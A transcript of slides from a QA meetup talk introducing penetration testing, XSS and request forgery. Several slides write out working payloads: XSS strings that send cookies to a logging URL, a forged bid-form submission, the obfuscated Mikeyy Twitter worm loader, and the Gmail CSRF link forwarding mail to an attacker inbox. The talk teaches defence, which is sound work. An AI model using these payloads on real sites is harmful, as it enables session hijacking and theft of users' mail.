This was a full length talk presented by Amit Dhakkad in vodQA-3 : A QA Meet held in ThoughtWorks, Pune.

1. AmitDhakad Application Developer Is considered a “survivor” Likes To Read About Black Magic & Illusions

2. What, why and how’s ofPenetration Testing - AmitDhakad Developer

3. What do I plan to cover? What is Penetration Testing? XSS What is it? Types of XSS Reflective XSS Stored XSS Request Forgery What is it? Types of Request Forgery On-site request forgery Cross-site request forgery Demo Attack mechanisms Real world examples Why do we need to pay attention?

4. Penetration Testing Simulating a malicious attack on a system

5. Cross-site scripting (XSS) Injecting javascript through user-controllable fields

6. Reflective XSS Injecting javascript using url parameters

7. Diagram courtesy : The Web Application Hacker’s Handbook

8. Attack:http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)

9. Stored XSS Exploiting server’s ability to persist

10. Diagram courtesy : The Web Application Hacker’s Handbook

11. Attack:Image url is set tohttp://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)

12. Request Forgery Perform unwitting actions on behalf of the user

13. On-site Request Forgery (OSRF) From same domain

14. Attack with XSS:Image url is set tohttp://www.myflorida.org.uk/images/disney_gif/Donald.gif“ onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();

15. Attack without XSS:Image url is set to /bids?bid[amount]=500&bid[auction_id]=1

16. Cross-site Request Forgery (CSRF) From a different domain

17. Same origin policy A page residing on one domain can cause an arbitrary request to be made to another domain, but it cannot itself process the data returned from that request. A page residing on one domain can load a script from another domain and execute this within its own context.

18. What can you do with XSS and Request Forgery? Session hijacking Performing arbitrary actions Disclosure of user data

19. Real world attacks

20. MySpace worm by Samy (XSS + OSRF) Bypassed all filters and added a script to his profile The script did two things: Added the visiting user as a friend The script got copied into the user’s profile Anyone visiting the new infected user also got added as Samy’s friend.

22. MySpace strips out the word "onreadystatechange" which is necessary for XML-HTTP requests

23. Attack:

25. Mikeyy twitter worm (XSS + OSRF) Implemented by a 17-year old boy "><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script> -- "<script src="http://www.stalkdaily.com/ajax.js"></script>" Visiting user got infected Infected users began twitting unwittingly.

26. Gmail vulnerability – discovered by PetkoPetkov (CSRF) http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter Add filter to forward all emails to the attacker’s email address

27. Why we need to pay attention? Shift is towards attacking clients Technologies don’t provide strong protection Considered as lame attacks Identification using automated tools is difficult Penetration testing is considered as a separate vertical

28. Break your own walls before anyone else does it

29. Q & A

30. Thank you